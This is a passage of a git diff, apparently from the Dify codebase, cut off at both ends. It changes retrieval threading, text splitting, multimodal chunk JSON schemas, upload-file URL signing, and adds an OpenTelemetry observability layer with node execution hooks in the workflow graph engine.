= None + if dataset.provider != "external": + if metadata_condition and not metadata_filter_document_ids: + continue + if metadata_filter_document_ids: + document_ids = metadata_filter_document_ids.get(dataset.id, []) + if document_ids: + document_ids_filter = document_ids + else: + continue + retrieval_thread = threading.Thread( + target=self._retriever, + kwargs={ + "flask_app": flask_app, + "dataset_id": dataset.id, + "query": query, + "top_k": top_k, + "all_documents": all_documents_item, + "document_ids_filter": document_ids_filter, + "metadata_condition": metadata_condition, + "attachment_ids": [attachment_id] if attachment_id else None, + }, + ) + threads.append(retrieval_thread) + retrieval_thread.start() + for thread in threads: + thread.join() + + if reranking_enable: + # do rerank for searched documents + data_post_processor = DataPostProcessor(tenant_id, reranking_mode, reranking_model, weights, False) + if query: + all_documents_item = data_post_processor.invoke( + query=query, + documents=all_documents_item, + score_threshold=score_threshold, + top_n=top_k, + query_type=QueryType.TEXT_QUERY, + ) + if attachment_id: + all_documents_item = data_post_processor.invoke( + documents=all_documents_item, + score_threshold=score_threshold, + top_n=top_k, + query_type=QueryType.IMAGE_QUERY, + query=attachment_id, + ) + else: + if index_type == IndexTechniqueType.ECONOMY: + if not query: + all_documents_item = [] + else: + all_documents_item = self.calculate_keyword_score(query, all_documents_item, top_k) + elif index_type == IndexTechniqueType.HIGH_QUALITY: + all_documents_item = self.calculate_vector_score(all_documents_item, top_k, score_threshold) + else: + all_documents_item = all_documents_item[:top_k] if top_k else all_documents_item + if all_documents_item: + all_documents.extend(all_documents_item) diff --git a/api/core/rag/splitter/fixed_text_splitter.py b/api/core/rag/splitter/fixed_text_splitter.py index 801d2a2a52..b65cb14d8e 100644 --- a/api/core/rag/splitter/fixed_text_splitter.py +++ b/api/core/rag/splitter/fixed_text_splitter.py @@ -2,6 +2,7 @@ from __future__ import annotations +import codecs import re from typing import Any @@ -52,7 +53,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) def __init__(self, fixed_separator: str = "\n\n", separators: list[str] | None = None, **kwargs: Any): """Create a new TextSplitter.""" super().__init__(**kwargs) - self._fixed_separator = fixed_separator + self._fixed_separator = codecs.decode(fixed_separator, "unicode_escape") self._separators = separators or ["\n\n", "\n", "。", ". ", " ", ""] def split_text(self, text: str) -> list[str]: @@ -94,7 +95,8 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = re.split(r" +", text) else: splits = text.split(separator) - splits = [item + separator if i < len(splits) else item for i, item in enumerate(splits)] + if self._keep_separator: + splits = [s + separator for s in splits[:-1]] + splits[-1:] else: splits = list(text) if separator == "\n": @@ -103,7 +105,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = [s for s in splits if (s not in {"", "\n"})] _good_splits = [] _good_splits_lengths = [] # cache the lengths of the splits - _separator = separator if self._keep_separator else "" + _separator = "" if self._keep_separator else separator s_lens = self._length_function(splits) if separator != "": for s, s_len in zip(splits, s_lens): diff --git a/api/core/schemas/builtin/schemas/v1/multimodal_general_structure.json b/api/core/schemas/builtin/schemas/v1/multimodal_general_structure.json new file mode 100644 index 0000000000..1a07869662 --- /dev/null +++ b/api/core/schemas/builtin/schemas/v1/multimodal_general_structure.json @@ -0,0 +1,65 @@ +{ + "$id": "https://dify.ai/schemas/v1/multimodal_general_structure.json", + "$schema": "http://json-schema.org/draft-07/schema#", + "version": "1.0.0", + "type": "array", + "title": "Multimodal General Structure", + "description": "Schema for multimodal general structure (v1) - array of objects", + "properties": { + "general_chunks": { + "type": "array", + "items": { + "type": "object", + "properties": { + "content": { + "type": "string", + "description": "The content" + }, + "files": { + "type": "array", + "items": { + "type": "object", + "properties": { + "name": { + "type": "string", + "description": "file name" + }, + "size": { + "type": "number", + "description": "file size" + }, + "extension": { + "type": "string", + "description": "file extension" + }, + "type": { + "type": "string", + "description": "file type" + }, + "mime_type": { + "type": "string", + "description": "file mime type" + }, + "transfer_method": { + "type": "string", + "description": "file transfer method" + }, + "url": { + "type": "string", + "description": "file url" + }, + "related_id": { + "type": "string", + "description": "file related id" + } + }, + "description": "List of files" + } + } + }, + "required": ["content"] + }, + "description": "List of content and files" + } + } +} \ No newline at end of file diff --git a/api/core/schemas/builtin/schemas/v1/multimodal_parent_child_structure.json b/api/core/schemas/builtin/schemas/v1/multimodal_parent_child_structure.json new file mode 100644 index 0000000000..4ffb590519 --- /dev/null +++ b/api/core/schemas/builtin/schemas/v1/multimodal_parent_child_structure.json @@ -0,0 +1,78 @@ +{ + "$id": "https://dify.ai/schemas/v1/multimodal_parent_child_structure.json", + "$schema": "http://json-schema.org/draft-07/schema#", + "version": "1.0.0", + "type": "object", + "title": "Multimodal Parent-Child Structure", + "description": "Schema for multimodal parent-child structure (v1)", + "properties": { + "parent_mode": { + "type": "string", + "description": "The mode of parent-child relationship" + }, + "parent_child_chunks": { + "type": "array", + "items": { + "type": "object", + "properties": { + "parent_content": { + "type": "string", + "description": "The parent content" + }, + "files": { + "type": "array", + "items": { + "type": "object", + "properties": { + "name": { + "type": "string", + "description": "file name" + }, + "size": { + "type": "number", + "description": "file size" + }, + "extension": { + "type": "string", + "description": "file extension" + }, + "type": { + "type": "string", + "description": "file type" + }, + "mime_type": { + "type": "string", + "description": "file mime type" + }, + "transfer_method": { + "type": "string", + "description": "file transfer method" + }, + "url": { + "type": "string", + "description": "file url" + }, + "related_id": { + "type": "string", + "description": "file related id" + } + }, + "required": ["name", "size", "extension", "type", "mime_type", "transfer_method", "url", "related_id"] + }, + "description": "List of files" + }, + "child_contents": { + "type": "array", + "items": { + "type": "string" + }, + "description": "List of child contents" + } + }, + "required": ["parent_content", "child_contents"] + }, + "description": "List of parent-child chunk pairs" + } + }, + "required": ["parent_mode", "parent_child_chunks"] +} \ No newline at end of file diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/signature.py b/api/core/tools/signature.py index 5cdf473542..fef3157f27 100644 --- a/api/core/tools/signature.py +++ b/api/core/tools/signature.py @@ -25,6 +25,24 @@ def sign_tool_file(tool_file_id: str, extension: str) -> str: return f"{file_preview_url}?timestamp={timestamp}&nonce={nonce}&sign={encoded_sign}" +def sign_upload_file(upload_file_id: str, extension: str) -> str: + """ + sign file to get a temporary url for plugin access + """ + # Use internal URL for plugin/tool file access in Docker environments + base_url = dify_config.INTERNAL_FILES_URL or dify_config.FILES_URL + file_preview_url = f"{base_url}/files/{upload_file_id}/image-preview" + + timestamp = str(int(time.time())) + nonce = os.urandom(16).hex() + data_to_sign = f"image-preview|{upload_file_id}|{timestamp}|{nonce}" + secret_key = dify_config.SECRET_KEY.encode() if dify_config.SECRET_KEY else b"" + sign = hmac.new(secret_key, data_to_sign.encode(), hashlib.sha256).digest() + encoded_sign = base64.urlsafe_b64encode(sign).decode() + + return f"{file_preview_url}?timestamp={timestamp}&nonce={nonce}&sign={encoded_sign}" + + def verify_tool_file_signature(file_id: str, timestamp: str, nonce: str, sign: str) -> bool: """ verify signature diff --git a/api/core/tools/utils/message_transformer.py b/api/core/tools/utils/message_transformer.py index ca2aa39861..df322eda1c 100644 --- a/api/core/tools/utils/message_transformer.py +++ b/api/core/tools/utils/message_transformer.py @@ -101,6 +101,8 @@ class ToolFileMessageTransformer: meta = message.meta or {} mimetype = meta.get("mime_type", "application/octet-stream") + if not mimetype: + mimetype = "application/octet-stream" # get filename from meta filename = meta.get("filename", None) # if message is str, encode it to bytes diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( diff --git a/api/core/tools/utils/text_processing_utils.py b/api/core/tools/utils/text_processing_utils.py index 105823f896..0f9a91a111 100644 --- a/api/core/tools/utils/text_processing_utils.py +++ b/api/core/tools/utils/text_processing_utils.py @@ -13,5 +13,5 @@ def remove_leading_symbols(text: str) -> str: """ # Match Unicode ranges for punctuation and symbols # FIXME this pattern is confused quick fix for #11868 maybe refactor it later - pattern = r"^[\u2000-\u206F\u2E00-\u2E7F\u3000-\u303F!\"#$%&'()*+,./:;<=>?@^_`~]+" + pattern = r'^[\[\]\u2000-\u2025\u2027-\u206F\u2E00-\u2E7F\u3000-\u300F\u3011-\u303F"#$%&\'()*+,./:;<=>?@^_`~]+' return re.sub(pattern, "", text) diff --git a/api/core/tools/workflow_as_tool/provider.py b/api/core/tools/workflow_as_tool/provider.py index 4852e9d2d8..0439fb1d60 100644 --- a/api/core/tools/workflow_as_tool/provider.py +++ b/api/core/tools/workflow_as_tool/provider.py @@ -221,7 +221,7 @@ class WorkflowToolProviderController(ToolProviderController): session.query(WorkflowToolProvider) .where( WorkflowToolProvider.tenant_id == tenant_id, - WorkflowToolProvider.app_id == self.provider_id, + WorkflowToolProvider.id == self.provider_id, ) .first() ) diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ -158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. + + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node._node_execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node._node_execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ... + + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. + +This layer creates OpenTelemetry spans for node execution, enabling distributed +tracing of workflow execution. It establishes OTel context during node execution +so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically +associates with the node span. +""" + +import logging +from dataclasses import dataclass +from typing import cast, final + +from opentelemetry import context as context_api +from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context +from typing_extensions import override + +from configs import dify_config +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.base import GraphEngineLayer +from core.workflow.graph_engine.layers.node_parsers import ( + DefaultNodeOTelParser, + NodeOTelParser, + ToolNodeOTelParser, +) +from core.workflow.nodes.base.node import Node +from extensions.otel.runtime import is_instrument_flag_enabled + +logger = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _NodeSpanContext: + span: "Span" + token: object + + +@final +class ObservabilityLayer(GraphEngineLayer): + """ + Layer that creates OpenTelemetry spans for node execution. + + This layer: + - Creates a span when a node starts execution + - Establishes OTel context so automatic instrumentation associates with the span + - Sets complete attributes and status when node execution ends + """ + + def __init__(self) -> None: + super().__init__() + self._node_contexts: dict[str, _NodeSpanContext] = {} + self._parsers: dict[NodeType, NodeOTelParser] = {} + self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser()) + self._is_disabled: bool = False + self._tracer: Tracer | None = None + self._build_parser_registry() + self._init_tracer() + + def _init_tracer(self) -> None: + """Initialize OpenTelemetry tracer in constructor.""" + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): + self._is_disabled = True + return + + try: + self._tracer = get_tracer(__name__) + except Exception as e: + logger.warning("Failed to get OpenTelemetry tracer: %s", e) + self._is_disabled = True + + def _build_parser_registry(self) -> None: + """Initialize parser registry for node types.""" + self._parsers = { + NodeType.TOOL: ToolNodeOTelParser(), + } + + def _get_parser(self, node: Node) -> NodeOTelParser: + node_type = getattr(node, "node_type", None) + if isinstance(node_type, NodeType): + return self._parsers.get(node_type, self._default_parser) + return self._default_parser + + @override + def on_graph_start(self) -> None: + """Called when graph execution starts.""" + self._node_contexts.clear() + + @override + def on_node_run_start(self, node: Node) -> None: + """ + Called when a node starts execution. + + Creates a span and establishes OTel context for automatic instrumentation. + """ + if self._is_disabled: + return + + try: + if not self._tracer: + return + + execution_id = node.execution_id + if not execution_id: + return + + parent_context = context_api.get_current() + span = self._tracer.start_span( + f"{node.title}", + kind=SpanKind.INTERNAL, + context=parent_context, + ) + + new_context = set_span_in_context(span) + token = context_api.attach(new_context) + + self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token) + + except Exception as e: + logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_node_run_end(self, node: Node, error: Exception | None) -> None: + """ + Called when a node finishes execution. + + Sets complete attributes, records exceptions, and ends the span. + """ + if self._is_disabled: + return + + try: + execution_id = node.execution_id + if not execution_id: + return + node_context = self._node_contexts.get(execution_id) + if not node_context: + return + + span = node_context.span + parser = self._get_parser(node) + try: + parser.parse(node=node, span=span, error=error) + span.end() + finally: + token = node_context.token + if token is not None: + try: + context_api.detach(token) + except Exception: + logger.warning("Failed to detach OpenTelemetry token: %s", token) + self._node_contexts.pop(execution_id, None) + + except Exception as e: + logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_event(self, event) -> None: + """Not used in this layer.""" + pass + + @override + def on_graph_end(self, error: Exception | None) -> None: + """Called when graph execution ends.""" + if self._node_contexts: + logger.warning( + "ObservabilityLayer: %d node spans were not properly ended", + len(self._node_contexts), + ) + self._node_contexts.clear() diff --git a/api/core/workflow/graph_engine/worker.py b/api/core/workflow/graph_engine/worker.py index 73e59ee298..e37a08ae47 100644 --- a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class WorkerPool: ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: list[GraphEngineLayer], flask_app: "Flask | None" = None, context_vars: "Context | None" = None, min_workers: int | None = None, @@ -53,6 +55,7 @@ class WorkerPool: ready_queue: Ready queue for nodes ready for execution event_queue: Queue for worker events graph: The workflow graph + layers: Graph engine layers for node execution hooks flask_app: Optional Flask app for context preservation context_vars: Optional context variables min_workers: Minimum number of workers @@ -65,6 +68,7 @@ class WorkerPool: self._graph = graph self._flask_app = flask_app self._context_vars = context_vars + self._layers = layers # Scaling parameters with defaults self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS @@ -144,6 +148,7 @@ class WorkerPool: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, worker_id=worker_id, flask_app=self._flask_app, context_vars=self._context_vars, diff --git a/api/core/workflow/node_events/node.py b/api/core/workflow/node_events/node.py index ebf93f2fc2..e4fa52f444 100644 --- a/api/core/workflow/node_events/node.py +++ b/api/core/workflow/node_events/node.py @@ -3,6 +3,7 @@ from datetime import datetime from pydantic import Field +from core.file import File from core.model_runtime.entities.llm_entities import LLMUsage from core.rag.entities.citation_metadata import RetrievalSourceMetadata from core.workflow.entities.pause_reason import PauseReason @@ -14,6 +15,7 @@ from .base import NodeEventBase class RunRetrieverResourceEvent(NodeEventBase): retriever_resources: Sequence[RetrievalSourceMetadata] = Field(..., description="retriever resources") context: str = Field(..., description="context") + context_files: list[File] | None = Field(default=None, description="context files") class ModelInvokeCompletedEvent(NodeEventBase): diff --git a/api/core/workflow/nodes/base/entities.py b/api/core/workflow/nodes/base/entities.py index e816e16d74..5aab6bbde4 100644 --- a/api/core/workflow/nodes/base/entities.py +++ b/api/core/workflow/nodes/base/entities.py @@ -59,7 +59,7 @@ class OutputVariableEntity(BaseModel): """ variable: str - value_type: OutputVariableType + value_type: OutputVariableType = OutputVariableType.ANY value_selector: Sequence[str] @field_validator("value_type", mode="before") diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py index c2e1105971..8ebba3659c 100644 --- a/api/core/workflow/nodes/base/node.py +++ b/api/core/workflow/nodes/base/node.py @@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]): def graph_init_params(self) -> "GraphInitParams": return self._graph_init_params + @property + def execution_id(self) -> str: + return self._node_execution_id + + def ensure_execution_id(self) -> str: + if not self._node_execution_id: + self._node_execution_id = str(uuid4()) + return self._node_execution_id + def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT: return cast(NodeDataT, self._node_data_type.model_validate(data)) @@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]): raise NotImplementedError def run(self) -> Generator[GraphNodeEventBase, None, None]: - # Generate a single node execution ID to use for all events - if not self._node_execution_id: - self._node_execution_id = str(uuid4()) + execution_id = self.ensure_execution_id() self._start_at = naive_utc_now() # Create and push start event with required fields start_event = NodeRunStartedEvent( - id=self._node_execution_id, + id=execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.title, @@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]): if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance] yield self._dispatch(event) elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance] - event.id = self._node_execution_id + event.id = self.execution_id yield event else: yield event @@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]): error_type="WorkflowNodeError", ) yield NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]): match result.status: case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent: return NodeRunStreamChunkEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, selector=event.selector, @@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]): match event.node_run_result.status: case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent: return NodeRunPauseRequestedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED), @@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent: return NodeRunAgentLogEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, message_id=event.message_id, @@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent: return NodeRunLoopStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent: return NodeRunLoopNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent: return NodeRunLoopSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent: return NodeRunLoopFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent: return NodeRunIterationStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent: return NodeRunIterationNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent: return NodeRunIterationSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent: return NodeRunIterationFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent: return NodeRunRetrieverResourceEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, retriever_resources=event.retriever_resources, diff --git a/api/core/workflow/nodes/http_request/entities.py b/api/core/workflow/nodes/http_request/entities.py index 5a7db6e0e6..e323533835 100644 --- a/api/core/workflow/nodes/http_request/entities.py +++ b/api/core/workflow/nodes/http_request/entities.py @@ -3,6 +3,7 @@ from collections.abc import Sequence from email.message import Message from typing import Any, Literal +import 